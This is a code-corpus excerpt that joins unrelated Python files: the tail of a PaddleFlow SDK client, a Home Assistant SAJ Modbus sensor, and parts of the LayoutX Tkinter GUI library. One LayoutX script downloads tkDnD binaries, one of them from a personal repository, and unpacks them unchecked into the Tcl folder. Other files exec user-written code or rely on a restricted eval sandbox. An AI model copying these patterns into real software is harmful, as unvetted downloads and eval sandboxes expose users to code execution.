none or empty") if queuename is None or queuename.strip() == "": raise PaddleFlowSDKException("InvalidQueueName", "queuename should not be none or empty") return QueueServiceApi.grant_queue(self.paddleflow_server, username, queuename, self.header) def ungrant_queue(self, username, queuename): """ grant queue""" self.pre_check() if username is None or username.strip() == "": raise PaddleFlowSDKException("InvalidName", "name should not be none or empty") if queuename is None or queuename.strip() == "": raise PaddleFlowSDKException("InvalidQueueName", "queuename should not be none or empty") return QueueServiceApi.ungrant_queue(self.paddleflow_server, username, queuename, self.header) def show_queue_grant(self, username=None, maxsize=100): """show queue grant info """ self.pre_check() if username and username.strip() == "": raise PaddleFlowSDKException("InvalidName", "name should not be none or empty") return QueueServiceApi.show_grant(self.paddleflow_server, username, self.header, maxsize) def del_queue(self, queuename): """ delete queue""" self.pre_check() if queuename is None or queuename.strip() == "": raise PaddleFlowSDKException("InvalidQueueName", "queuename should not be none or empty") return QueueServiceApi.del_queue(self.paddleflow_server, queuename, self.header) def list_queue(self, maxsize=100, marker=None): """ list queue """ self.pre_check() return QueueServiceApi.list_queue(self.paddleflow_server, self.header, maxsize, marker) def show_queue(self, queuename): """ show queue info """ self.pre_check() if queuename is None or queuename.strip() == "": raise PaddleFlowSDKException("InvalidQueueName", "queuename should not be none or empty") return QueueServiceApi.show_queue(self.paddleflow_server, queuename, self.header) def list_flavour(self, maxsize=100, marker=None, clustername="", key=""): """ list flavour """ self.pre_check() return FlavouriceApi.list_flavour(host=self.paddleflow_server, header=self.header, maxsize=maxsize, marker=marker, clustername=clustername, key=key) def show_flavour(self, name): """ show flavour """ self.pre_check() if name is None or name.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "name should not be none or empty") return FlavouriceApi.show_flavour(self.paddleflow_server, name, self.header) def add_flavour(self, name, cpu, memory, scalar_resources=None, cluster_name=None): """ add flavour""" self.pre_check() if name is None or name.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "name should not be none or empty") if cpu is None or cpu.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "cpu should not be none or empty") if memory is None or memory.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "memory should not be none or empty") return FlavouriceApi.add_flavour(self.paddleflow_server, name, cpu=cpu, mem=memory, scalar_resources=scalar_resources, cluster_name=cluster_name, header=self.header) def del_flavour(self, flavourname): """ delete flavour""" self.pre_check() if flavourname is None or flavourname.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "flavourname should not be none or empty") return FlavouriceApi.del_flavour(self.paddleflow_server, flavourname, self.header) def update_flavour(self, name, cpu=None, memory=None, scalar_resources=None, cluster_name=None): """ update cluster """ self.pre_check() if name is None or name.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "name should not be none or empty") return FlavouriceApi.update_flavour(self.paddleflow_server, name, cpu=cpu, mem=memory, scalar_resources=scalar_resources, cluster_name=cluster_name, header=self.header) def add_fs(self, fsname, url, username=None, properties=None): """ add fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if url is None or url.strip() == "": raise PaddleFlowSDKException("InvalidURL", "url should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.add_fs(self.paddleflow_server, fsname, url, self.user_id, properties, userinfo) def show_fs(self, fsname, username=None): """ show fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.show_fs(self.paddleflow_server, fsname, self.user_id, userinfo) def delete_fs(self, fsname, username=None): """ delete fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.delete_fs(self.paddleflow_server, fsname, self.user_id, userinfo) def list_fs(self, username=None, maxsize=100): """ list fs """ self.pre_check() if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.list_fs(self.paddleflow_server, self.user_id, userinfo, maxsize) def mount(self, fsname, path, mountOptions, username=None): """ mount fs """ self.pre_check() if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") if fsname == "": raise PaddleFlowSDKException("InvalidFsName", "fsname should not be none or empty") if path == "": raise PaddleFlowSDKException("InvalidPath", "path should not be none or empty") userinfo = {'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.mount(self.paddleflow_server, fsname, path, self.user_id, self.password, mountOptions, userinfo) def create_cache(self, fsname, options, username=None): """ create cache config for fs """ self.pre_check() if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") if fsname == "": raise PaddleFlowSDKException("InvalidFsName", "fsname should not be none or empty") userinfo = {'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.create_cache(self.paddleflow_server, fsname, options, userinfo) def update_fs_cache(self, fsname, params, username=None): """ update cache config for fs """ self.pre_check() if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") if fsname == "": raise PaddleFlowSDKException("InvalidFsName", "fsname should not be none or empty") userinfo = {'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.update_cache(self.paddleflow_server, fsname, params, userinfo) def get_fs_cache(self, fsname, username=None): """ get cache config for fs """ self.pre_check() if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") if fsname == "": raise PaddleFlowSDKException("InvalidFsName", "fsname should not be none or empty") userinfo = {'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.get_cache(self.paddleflow_server, fsname, userinfo) def delete_fs_cache(self, fsname, username=None): """ delete fs cache config """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.delete_cache(self.paddleflow_server, fsname, userinfo) def add_link(self, fsname, fspath, url, username=None, properties=None): """ add link """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if url is None or url.strip() == "": raise PaddleFlowSDKException("InvalidURL", "url should not be none or empty") if fspath is None or fspath.strip() == "": raise PaddleFlowSDKException("InvalidFSPath", "fspath should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.add_link(self.paddleflow_server, fsname, fspath, url, self.user_id, properties, userinfo) def delete_link(self, fsname, fspath, username=None): """ delete fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") if fspath is None or fspath.strip() == "": raise PaddleFlowSDKException("InvalidFSPath", "fspath should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.delete_link(self.paddleflow_server, fsname, fspath, self.user_id, userinfo) def list_link(self, fsname, username=None, maxsize=100): """ list fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.list_link(self.paddleflow_server, fsname, self.user_id, userinfo, maxsize) def show_link(self, fsname, fspath, username=None): """ show fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if fspath is None or fspath.strip() == "": raise PaddleFlowSDKException("InvalidFSPath", "fspath should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.show_link(self.paddleflow_server, fsname, fspath, self.user_id, userinfo) def create_run(self, fsname, username=None, runname=None, desc=None, runyamlpath=None, runyamlraw=None, pipelineid=None, param=None, disabled=None, dockerenv=None): """ create run """ self.pre_check() if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") if runname and runname.strip() == "": raise PaddleFlowSDKException("InvalidRunName", "runname should not be none or empty") return RunServiceApi.add_run(self.paddleflow_server, fsname, runname, desc, param, username, runyamlpath, runyamlraw, pipelineid, self.header, disabled, dockerenv) def list_run(self, fsname=None, username=None, runid=None, runname=None, maxsize=100, marker=None): """ list run """ self.pre_check() if fsname and fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") if runid and runid.strip() == "": raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty") return RunServiceApi.list_run(self.paddleflow_server, fsname, username, runid, runname, self.header, maxsize, marker) def status_run(self, runid): """ status run """ self.pre_check() if runid is None or runid.strip() == "": raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty") return RunServiceApi.status_run(self.paddleflow_server, runid, self.header) def stop_run(self, runid, force=False): """ stop run """ self.pre_check() if runid is None or runid.strip() == "": raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty") if not isinstance(force, bool): raise PaddleFlowSDKException("InvalidParam", "the Parameter [force] should be an instance of bool") return RunServiceApi.stop_run(self.paddleflow_server, runid, self.header, force) def create_cluster(self, clustername, endpoint, clustertype, credential=None, description=None, source=None, setting=None, status=None, namespacelist=None, version=None): """ create cluster """ self.pre_check() if clustername is None or clustername.strip() == "": raise PaddleFlowSDKException("InvalidClusterName", "clustername should not be none or empty") if endpoint is None or endpoint.strip() == "": raise PaddleFlowSDKException("InvalidEndpoint", "endpoint should not be none or empty") if clustertype is None or clustertype.strip() == "": raise PaddleFlowSDKException("InvalidClusterType", "clustertype should not be none or empty") return ClusterServiceApi.create_cluster(self.paddleflow_server, clustername, endpoint, clustertype, credential, description, source, setting, status, namespacelist, version, self.header) def list_cluster(self, maxkeys=100, marker=None, clustername=None, clusterstatus=None): """ list cluster """ self.pre_check() return ClusterServiceApi.list_cluster(self.paddleflow_server, maxkeys, marker, clustername, clusterstatus, self.header) def show_cluster(self, clustername): """ status cluster """ self.pre_check() if clustername is None or clustername == "": raise PaddleFlowSDKException("InvalidClusterName", "clustername should not be none or empty") return ClusterServiceApi.show_cluster(self.paddleflow_server, clustername, self.header) def delete_cluster(self, clustername): """ delete cluster """ self.pre_check() if clustername is None or clustername == "": raise PaddleFlowSDKException("InvalidClusterName", "clustername should not be none or empty") return ClusterServiceApi.delete_cluster(self.paddleflow_server, clustername, self.header) def update_cluster(self, clustername, endpoint=None, credential=None, clustertype=None, description=None, source=None, setting=None, status=None, namespacelist=None, version=None): """ update cluster """ self.pre_check() if clustername is None or clustername == "": raise PaddleFlowSDKException("InvalidClusterName", "clustername should not be none or empty") return ClusterServiceApi.update_cluster(self.paddleflow_server, clustername, endpoint, credential, clustertype, description, source, setting, status, namespacelist, version, self.header) def list_cluster_resource(self, clustername=None): """ list cluster resource """ self.pre_check() return ClusterServiceApi.list_cluster_resource(self.paddleflow_server, clustername, self.header) def create_pipeline(self, fsname, yamlpath, name=None, username=None): """ create pipeline """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFsName", "fsname should not be none or empty") if yamlpath is None or yamlpath.strip() == "": raise PaddleFlowSDKException("InvalidYamlPath", "yamlpath should not be none or empty") return PipelineServiceApi.create_pipeline(self.paddleflow_server, fsname, yamlpath, name, username, self.header) def list_pipeline(self, userfilter=None, fsfilter=None, namefilter=None, maxkeys=None, marker=None): """ list pipeline """ self.pre_check() return PipelineServiceApi.list_pipeline(self.paddleflow_server, userfilter, fsfilter, namefilter, maxkeys, marker, self.header) def show_pipeline(self, pipelineid): """ status pipeline """ self.pre_check() if pipelineid is None or pipelineid == "": raise PaddleFlowSDKException("InvalidPipelineID", "pipelineid should not be none or empty") return PipelineServiceApi.show_pipeline(self.paddleflow_server, pipelineid, self.header) def delete_pipeline(self, pipelineid): """ delete pipeline """ self.pre_check() if pipelineid is None or pipelineid == "": raise PaddleFlowSDKException("InvalidPipelineID", "pipelineid should not be none or empty") return PipelineServiceApi.delete_pipeline(self.paddleflow_server, pipelineid, self.header) def retry_run(self, runid): """ retry run """ self.pre_check() if runid is None or runid == "": raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty") return RunServiceApi.retry_run(self.paddleflow_server, runid, self.header) def delete_run(self, runid): """ status run """ self.pre_check() if runid is None or runid == "": raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty") return RunServiceApi.delete_run(self.paddleflow_server, runid, self.header) def artifact(self, userfilter=None, fsfilter=None, runfilter=None, typefilter=None, pathfilter=None, maxkeys=None, marker=None): """ artifact """ self.pre_check() return RunServiceApi.artifact(self.paddleflow_server, userfilter, fsfilter, runfilter, typefilter, pathfilter, maxkeys, marker, self.header) def list_cache(self, userfilter=None, fsfilter=None, runfilter=None, maxkeys=None, marker=None): """ list run cache """ self.pre_check() return RunServiceApi.list_runcache(self.paddleflow_server, userfilter, fsfilter, runfilter, maxkeys, marker, self.header) def show_cache(self, cacheid): """ status pipeline """ self.pre_check() if cacheid is None or cacheid == "": raise PaddleFlowSDKException("InvalidCacheID", "cacheid should not be none or empty") return RunServiceApi.show_runcache(self.paddleflow_server, cacheid, self.header) def delete_cache(self, cacheid): """ status pipeline """ self.pre_check() if cacheid is None or cacheid == "": raise PaddleFlowSDKException("InvalidCacheID", "cacheid should not be none or empty") return RunServiceApi.delete_runcache(self.paddleflow_server, cacheid, self.header) def show_log(self, runid, jobid=None, pagesize=None, pageno=None, logfileposition=None): """ show run log """ self.pre_check() if runid is None or runid == "": raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty") return LogServiceApi.get_log_info(self.paddleflow_server, runid, jobid, pagesize, pageno, logfileposition, self.header) def create_job(self, job_type, job_request): """ create_job """ self.pre_check() if job_type is None or (job_type != 'single' and job_type != 'distributed' and job_type != 'workflow'): raise PaddleFlowSDKException("InvalidJobType", "job_type should not be none and should be single, distributed or workflow") if job_request.queue is None or job_request.queue == '': raise PaddleFlowSDKException("InvalidJobRequest", "job_request queue should not be none or empty") return JobServiceApi.create_job(self.paddleflow_server, job_type, job_request, self.header) def show_job(self, jobid): """ show_job """ self.pre_check() if jobid is None or jobid == "": raise PaddleFlowSDKException("InvalidJobID", "jobid should not be none or empty") return JobServiceApi.show_job(self.paddleflow_server, jobid, self.header) def list_job(self, status=None, timestamp=None, start_time=None, queue=None, labels=None, maxkeys=None, marker=None): """ list_job """ self.pre_check() return JobServiceApi.list_job(self.paddleflow_server, status, timestamp, start_time, queue, labels, maxkeys, marker, self.header) def stop_job(self, jobid): """ stop_job """ self.pre_check() if jobid is None or jobid == "": raise PaddleFlowSDKException("InvalidJobID", "jobid should not be none or empty") return JobServiceApi.stop_job(self.paddleflow_server, jobid, self.header) def delete_job(self, jobid): """ delete_job """ self.pre_check() if jobid is None or jobid == "": raise PaddleFlowSDKException("InvalidJobID", "jobid should not be none or empty") return JobServiceApi.delete_job(self.paddleflow_server, jobid, self.header) ```
{ "source": "8OND007/home-assistant-saj-modbus", "score": 2 }
#### File: custom_components/saj_modbus/sensor.py ```python from __future__ import annotations from datetime import datetime from homeassistant.helpers.update_coordinator import CoordinatorEntity from homeassistant.components.sensor import SensorEntity import logging from typing import Optional from homeassistant.const import CONF_NAME from homeassistant.core import callback import homeassistant.util.dt as dt_util from .const import ( ATTR_MANUFACTURER, DOMAIN, SENSOR_TYPES, SajModbusSensorEntityDescription, ) from .hub import SAJModbusHub _LOGGER = logging.getLogger(__name__) async def async_setup_entry(hass, entry, async_add_entities): hub_name = entry.data[CONF_NAME] hub = hass.data[DOMAIN][hub_name]["hub"] device_info = { "identifiers": {(DOMAIN, hub_name)}, "name": hub_name, "manufacturer": ATTR_MANUFACTURER, } entities = [] for sensor_description in SENSOR_TYPES.values(): sensor = SajSensor( hub_name, hub, device_info, sensor_description, ) entities.append(sensor) async_add_entities(entities) return True class SajSensor(CoordinatorEntity, SensorEntity): """Representation of an SAJ Modbus sensor.""" def __init__( self, platform_name: str, hub: SAJModbusHub, device_info, description: SajModbusSensorEntityDescription, ): """Initialize the sensor.""" self._platform_name = platform_name self._attr_device_info = device_info self.entity_description: SajModbusSensorEntityDescription = description super().__init__(coordinator=hub) @property def name(self): """Return the name.""" return f"{self._platform_name} {self.entity_description.name}" @property def unique_id(self) -> Optional[str]: return f"{self._platform_name}_{self.entity_description.key}" @property def native_value(self): """Return the state of the sensor.""" return ( self.coordinator.data[self.entity_description.key] if self.entity_description.key in self.coordinator.data else None ) ```
{ "source": "8or5q/LayoutX", "score": 3 }
#### File: LayoutX/demo/show_image.py ```python from layoutx import app from layoutx.store import create_store from layoutx.view import View, ResizeOption store = create_store({ "SET_IMAGE": lambda state, payload: {**state, **{"data": payload}} }, { "data": "" }) class ImageShowcase(View): geometry = "800x600+200+200" title = "ImageViewer" resizable = ResizeOption.NONE template= """\ Box Label(weight="0") Image Viewer ImageViewer(name="image" background="black" imagedata="{data}") Button(weight="0" height="20" command="{load_image}") New Image """ async def load_image(self): # Find view child widget api not yet finalized imageViewer = self._widget.find_first("image") # Get tkinter attributes height = imageViewer.widget.tk.winfo_height() width = imageViewer.widget.tk.winfo_width() import aiohttp import io from random import randint imagedata = None session = aiohttp.ClientSession() async with session.get(f"http://placekitten.com/{width}/{height}?image={randint(0,17)}") as imageResource: from PIL import Image, ImageTk load = Image.open(io.BytesIO(await imageResource.read())) imagedata = ImageTk.PhotoImage(load) await session.close() self.store.dispatch("SET_IMAGE", imagedata) from layoutx.widgets import Widget from tkinter import ttk class ImageViewer(Widget): def __init__(self, master, **kwargs): super().__init__(tk=ttk.Label(master=master), **kwargs) self.connect_to_prop("imagedata", self.on_imagedata_changed) def on_imagedata_changed(self, imagedata): if imagedata == '': return self._tk.configure(image=imagedata) app.add_custom_widget("ImageViewer", ImageViewer) if __name__ == "__main__": app.setup(store=store, rootView=ImageShowcase) app.run() ``` #### File: LayoutX/layoutx/app.py ```python import tkinter as tk import tkinter.font as tkFont from .store import Store from .view import View, ResizeOption from .utils import Singleton, is_windows from ._registry import RegistryNode from .tkDnD import TkinterDnD import logging import asyncio __all__ = ["Application"] @Singleton class Application(RegistryNode): def __init__(self): super().__init__(widget = self, name = "app") #Import Widgets import layoutx.widgets self._widgets = {} for name in layoutx.widgets.__all__: self._widgets.update({name : getattr(layoutx.widgets, name)}) self._tk = None self._loop = None self._root_node = None self._style = None self._config = {} def setup(self, store: Store, rootView: View, font=None, style: str=None, interval=1/120, loop=None): if not self._tk: self._tk = TkinterDnD.Tk() self._loop = loop if loop else asyncio.get_event_loop() self._tk.protocol("WM_DELETE_WINDOW", self.close) self._ui_task = self._loop.create_task(self._updater(interval)) # Pick first system font as default if none given if font: self._config["font"] = font else: if is_windows(): self._config["font"] = {"family": "Courier New", "size": 12} if "Courier New" in tkFont.families() else {"family":tkFont.families()[1], "size": 12} else: self._config["font"] = {"family": "DejaVu Sans Mono", "size": 12} if "DejaVu Sans Mono" in tkFont.families() else {"family":tkFont.families()[1], "size": 12} if style and not self._style: try: from ttkthemes import ThemedStyle self._style = ThemedStyle(self._tk) self._style.set_theme(style) except ImportError: # ttkstyles not installed self._style = tk.ttk.Style() else: self._style = tk.ttk.Style() if self._root_node: self.remove_node(self._root_node) self._root_node = self.add_view( rootView( tkinter=self._tk, store=store ) ) self._root_node.widget.redraw() @property def loop(self): return self._loop def close(self): self._ui_task.add_done_callback(lambda *_: self._cleanup()) self._ui_task.cancel() @property def config(self): return self._config @property def style(self): return self._style def run( self ): self._loop.run_forever() self._loop.close() def get_root_node(self) -> RegistryNode: return self._root_node def get_view(self, name: str) -> RegistryNode: filter_view = self.filter_children(name=name) if len(filter_view) == 1: return filter_view[0] else: raise ValueError(f"View {name} not registed") def add_view(self, view: View) -> RegistryNode: name = view.__class__.__name__ old_view = self.filter_children(name=name) if len(old_view) > 0: self.remove_node(old_view[0]) if len(self.children) > 0: view.hide() return self._add_node(widget=view, name=view.__class__.__name__) def add_custom_widget(self, name, cls): if name in self._widgets: raise ValueError(f"Widget name: {name} already exists") self._widgets[name] = cls def update(self): self._tk.update() def get_widget_cls(self, name): if name not in self._widgets: raise KeyError(f"Widget: {name}, does not exist or was never added to the registry") return self._widgets[name] async def _updater(self, interval): while True: self.update() await asyncio.sleep(interval) def _cleanup(self): self._loop.stop() self._tk.destroy() ``` #### File: LayoutX/layoutx/install_tkdnd.py ```python import platform import urllib.request import io import subprocess import pathlib import shutil import hashlib import time def dnd_installed(): try: import tkinter tk_root = tkinter.Tk() version = tk_root.tk.call('package', 'require', 'tkdnd') tk_root.tk.call('package', 'forget', 'tkdnd') tk_root.destroy() tk_root.tk = None tk_root = None return version except: return False def dnd_install(): urls = { "Windows" : "https://github.com/petasis/tkdnd/releases/download/tkdnd-release-test-v2.9.2/tkdnd-2.9.2-windows-x64.zip", "Linux" : "https://github.com/petasis/tkdnd/releases/download/tkdnd-release-test-v2.9.2/tkdnd-2.9.2-linux-x64.tgz", "Darwin" : "https://github.com/petasis/tkdnd/releases/download/tkdnd-release-test-v2.9.2/tkdnd-2.9.2-osx-x64.tgz", "RaspberryPiOS" : "https://github.com/8or5q/otp-voip/raw/master/pi_11/tkdnd-2.9.2-linux-armhf.tgz", } hashes = { "Windows" : "d78007d93d8886629554422de2e89f64842ac9994d226eab7732cc4b59d1feea", "Linux" : "f0e956e4b0d62d4c7e88dacde3a9857e7a303dc36406bdd4d33d6459029a2843", "Darwin" : "0c604fb5776371e59f4c641de54ea65f24917b8e539a577484a94d2f66f6e31d", "RaspberryPiOS" : "19f16116fcfc14459bbee80ab00766da6a15445d88fb011f76a13589ff54e945", } print("Starting installation of tkDND") os = platform.system() machine = platform.machine() if machine.startswith("arm"): os = 'RaspberryPiOS' elif os not in ["Windows", "Linux", "Darwin"]: print(f"{os} not supported!") exit(0) result = None archive = None url = urls[os] download_hash = hashes[os] import tkinter root = tkinter.Tk() tcl_dir = pathlib.Path(root.tk.exprstring('$tcl_library')) for p in tcl_dir.glob("tkdnd*"): print("tkdnd already installed") shutil.rmtree(p) print("Download tkDnD libraries from github") data = urllib.request.urlopen(url).read() data_hash = hashlib.sha256(data).hexdigest() if (download_hash != data_hash): print(f"Got hash: {data_hash}") print(f"Expected hash: {download_hash}") print("Download incomplete or your security is compromised!!!") exit(1) print("Extracting tkDnD to tcl extension folder") if os == "Windows": import zipfile archive = zipfile.ZipFile(io.BytesIO(data)) archive.extractall(path=tcl_dir) elif os == "Linux" or os == "Darwin" or os == "RaspberryPiOS": import tarfile archive = tarfile.open(fileobj=io.BytesIO(data)) archive.extractall(path=tcl_dir) print("tkdnd installed!") if __name__ == "__main__": min_version = "2.9.2" version = dnd_installed() if not version or version < min_version: dnd_install() ``` #### File: layoutx/tools/designer.py ```python from layoutx import app from layoutx.store import create_store from layoutx.view import View, ResizeOption import asyncio import ast import logging import sys def create_view(template, methods): newline = '\n' exec(f""" class DemoView(View): geometry = "400x400+900+100" title = "Demo" template = \"\"\"{template}\"\"\" { newline.join([f" {line}" for line in methods.split(newline)]) } """) return eval("DemoView") store = create_store({}, { "data": """\ { "name": "news", "counter": 0, "isBool": True, "code": "import antigravity" }""", "template": """\ ScrollFrame Button(command="{partial(print_hello, name)}") asyncio Button(command="{reducer}") | Hello {name} Label(:Button-1:="{partial(print_hello, 'label clicked')}") {name} Label hello {getter()} """, "view": """\ async def print_hello(self, txt, *args): import asyncio await asyncio.sleep(1) print("tkEvent", args) print(txt) def getter(self): return 'dynamic getter' def on_drop(self, path): print(path) def reducer(self): self.store.dispatch("SET_NAME", "from reducer") """, "store": """\ { "SET_NAME": lambda state, payload: {**state, **{"name": payload}} } """ }) class RootView(View): geometry = "800x600+100+100" title = "Designer" template = """\ SplitPane(orient="vertical") SplitPane Box Template TextArea(autocomplete="{get_autocomplete()}", highlightstyle="monokai", spaces="2", language="pug" value="{{template}}") Box Store data TextArea(highlightstyle="monokai", spaces="2", language="json" value="{{data}}" ) SplitPane Box View Methods TextArea(highlightstyle="monokai", spaces="2", language="python" value="{{view}}") Box Store Reducer TextArea(highlightstyle="monokai", spaces="2", language="python" value="{{store}}") """ demoView = None demoStore = None def get_autocomplete(self): return [{ "name": "Label", "value": "Label hello" },{ "name": "Button", "value": "Button(command=\"{cmd}\")" }, { "name": "Box", "value": "Box(orient=\"vertical\")" },{ "name": "SplitPane", "value": "SplitPane" },{ "name": "ComboBox", "value": "ComboBox(value='{{name}}', suggestion=['1','2'])" },{ "name": "CheckBox", "value": "CheckBox(value='{{isBool}}') Check me" },{ "name": "DropTarget", "value": "DropTarget(on_drop=\"{on_drop}\")" },{ "name": "TextArea", "value": "TextArea(highlightstyle='monokai', spaces='2', language='python', value='{{code}}' )" },{ "name": "ScrollFrame", "value": "ScrollFrame" },{ "name": "Scale", "value": "Scale(value='{{counter}}' to=\"100\")" },{ "name": "Input", "value": "Input(value='{{name}}' suggestion=['1', '2'])" }] def set_menu(self): return { "Reload UI": self.update_ui, "Update Data": self.update_data, "Import Example": self.import_data, "Export Example": self.export_data } @property def _get_state(self): return self._store.state def export_data(self): from tkinter import filedialog import json filename = filedialog.asksaveasfilename(filetypes=[('LxDesign File', '.lxconfig')], defaultextension=".lxconfig") if filename: with open(filename, "w", encoding='utf-8') as dataFile: dataFile.writelines(json.dumps(self._get_state)) def import_data(self): from tkinter import filedialog, messagebox try: data = filedialog.askopenfilename(filetypes=[('LxDesign File', '.lxconfig')], defaultextension=".lxconfig") if data is None: return with open(data, "r", encoding='utf-8') as dataFile: self.store._state.on_next( ast.literal_eval(dataFile.read() )) except: messagebox.showerror("Error", "Import Data not valid") def _create_view(self): self.demoStore = create_store(eval(self._get_state["store"]), ast.literal_eval(self._get_state["data"])) view_class = create_view(self._get_state["template"], self._get_state["view"]) self.demoView = app.add_view(view_class(store=self.demoStore)).widget if len(self.demoView.logger.handlers) == 0: handler = logging.StreamHandler(sys.stdout) handler.setLevel(logging.DEBUG) formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') handler.setFormatter(formatter) self.demoView.logger.addHandler(handler) self.demoView.show() def update_ui(self): if self.demoView: self.demoView.redraw(self._get_state["template"]) else: self._create_view() def update_data(self): if self.demoStore: self.demoStore._state.on_next(ast.literal_eval(self._get_state["data"])) else: self._create_view() def update_store(self): self._create_view() def main(): app.setup(store=store, rootView=RootView) app.run() if __name__ == "__main__": app.setup(store=store, rootView=RootView) app.run() ``` #### File: LayoutX/layoutx/utils.py ```python import platform from typing import List, Callable from copy import deepcopy, copy import ast from functools import reduce __all__ = [ "get_os", "is_windows", "safe_get", "safe_set", "safer_eval", "safe_list", "safe_dict" ] class Singleton: def __init__(self, decorated): self._decorated = decorated def instance(self, **kwargs): try: return self._instance except AttributeError: self._instance = self._decorated(**kwargs) return self._instance def __call__(self): raise TypeError('Singletons must be accessed through `instance()`.') def get_os(): return platform.system() def is_windows(): return get_os() == "Windows" def safe_get(data, keys: List[str]): for key in keys: try: data = data[int(key)] if isinstance(data, list) else data[key] except KeyError: return None return data def safe_set(data, keys: List[str], value): data_copy = deepcopy(data) dic = data_copy for key in keys[:-1]: dic = dic[int(key)] if isinstance(dic, list) else dic.setdefault(key, {}) dic[int(keys[-1]) if isinstance(dic, list) else keys[-1]] = value return data_copy safe_list = [ 'abs', 'all', 'any', 'ascii', 'bin', 'callable', 'chr', 'dir', 'divmod', 'format','getattr', 'hasattr', 'hash', 'hex', 'id', 'input', 'isinstance', 'issubclass', 'iter', 'len', 'max', 'min', 'next', 'oct', 'ord', 'pow', 'repr', 'round', 'sorted', 'sum', 'bool', 'bytearray', 'bytes', 'complex', 'dict', 'enumerate', 'filter', 'float', 'frozenset', 'int', 'list', 'map', 'object', 'range', 'reversed', 'set', 'slice', 'str', 'tuple', 'type', 'zip', 'partial' ] safe_dict = dict([ (k, globals()["__builtins__"].get(k)) for k in safe_list ]) from functools import partial safe_dict["partial"] = partial def safer_eval(exp: str, variables={}): return eval(exp, {"__builtins__":None}, dict(copy(safe_dict), **variables)) def security_check_ast(tree: ast.AST, allowed_internal_names = []): for node in ast.walk(tree): # Block Assignments, Imports, Deletion, etc. if isinstance(node, ( ast.Assign, ast.Assert, ast.AnnAssign, ast.AugAssign, ast.alias, ast.FunctionDef, ast.Import, ast.ImportFrom, ast.Del, ast.Delete, ast.Global, ast.Nonlocal)): raise ValueError(f"Illegal Expression Type: { node.__class__.mro()[0].__name__}") import sys # Python 3.8 if sys.version_info >= (3, 8) and isinstance(node, ast.NamedExpr): raise ValueError(f"Illegal Expression Type: { node.__class__.mro()[0].__name__}") if isinstance(node, ast.Name): if node.id not in allowed_internal_names and node.id.startswith("_"): raise ValueError(f"Internal Name cannot be used!") if isinstance(node, (ast.NameConstant, ast.Constant)): if str(node.value).startswith("_"): raise ValueError(f"Internal Name cannot be used!") if isinstance(node, ast.Attribute): if node.attr.startswith("_"): raise ValueError(f"Internal Name cannot be used!") if isinstance(node, ast.Call) and isinstance(node.func, ast.Name): if node.func.id.startswith("_"): raise ValueError(f"Function { node.func.id } cannot be used!") #if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute): # raise ValueError(f"Cannot use object methods") def compile_exp(exp: str, path_mapping={}, allowed_names=[], attr2sub=False, mode="eval"): return compile_ast(ast.parse(exp).body[0].value, path_mapping=path_mapping, allowed_names=allowed_names, 